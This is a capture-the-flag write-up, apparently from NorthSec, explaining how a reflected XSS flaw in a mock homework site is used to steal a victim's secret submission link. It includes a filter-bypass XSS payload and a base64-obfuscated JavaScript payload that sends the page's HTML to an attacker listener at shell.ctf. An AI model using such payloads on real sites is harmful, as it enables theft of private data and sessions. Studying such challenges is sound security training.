A Severity High student’s homework is going to be late if we don’t help them steal the smart kid’s assignment which has already been submitted to the online homework submission site at
Additionally, the student tells us that they have managed to install some malware on the smart kid’s machine (hosted at
homeworks-malware.ctf) which we could leverage in our homework heist.
Looking quickly at
homeworks.ctf show a fairly limited page consisting of:
- A file upload functionality for uploading our homework.
- An about page which explains that individuals are authenticated to the application by their IP.
checkpage which gives us a personal “secret link” to our homework submission.
The malware mentioned in the forum post is reachable at
homworks-malware.ctf and consists of a simple form which lets us make requests to the
homeworks.ctf site as the smart kid’s browser.
We initially thought we were going to have to find a way to point these browser requests to the attacker machine at
shell.ctf, to gather their IP address, and use X-Forwarded-For headers, or other means, to appear authenticated as the smart kid. This path didn’t pan out.
We continued to investigate and found a reflected cross-site scripting (XSS) vulnerability which could be triggered via the page’s url/path.
There is a very limited attempt at filtering this sort of attack, as the first set of
<> characters, but that is circumvented. Additionally, using any unencoded
/ characters results in a 404.
For example, the legitimate homework check page sits at:
A reflected XSS payload can be triggered with the following request:
http://homeworks.ctf/check/Severity High<><img src=x onerror=alert(1)>
With this XSS we can execute code in the context of the smart kid victim’s browser using the provided malware.
We know that the homework can be found via the personalized “secret link” from the /check page, so we have to construct a payload which can collect that information and send it to a listener on our attacker machine at
The payload we want to trigger against the smart kid’s browser is:
var text = btoa(document.documentElement.innerHTML); req = new XMLHttpRequest(); req.open("GET","http://shell.ctf:8000/"+text); req.send();
This will save the entirety of the /check page (base64 encoded) into a variable, and use it as the path in a request the attacker web server at
shell.ctf, which will allow us to intercept the smart kid’s “secret link” and grab his homework.
To make this more manageable to send, the payload is base64 encoded and passed via
eval(), making the final reflected XSS link payload:
http://homeworks.ctf/homeworks/check/Severity High<><img src=x onerror=eval(atob("dmFyIHRleHQ9YnRvYShkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuaW5uZXJIVE1MKTsgcmVxID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVxLm9wZW4oIkdFVCIsImh0dHA6Ly9zaGVsbC5jdGY6ODAwMC8iK3RleHQpO3JlcS5zZW5kKCk7"))>
We can enter this as our input to the malware at
homeworks-malware.ctf, triggering the XSS and sending a request with the info we need to a listener waiting on
Decoding the request received gives us the smart kid’s personalized “secret link” to his homework submission. Visiting the link yields both the homework, and our flag.
- Check out NorthSec. Many thanks to them for the fun CTF.
- PortSwigger has a good page on exploiting XSS to steal information, including a couple of labs : https://portswigger.net/web-security/cross-site-scripting/exploiting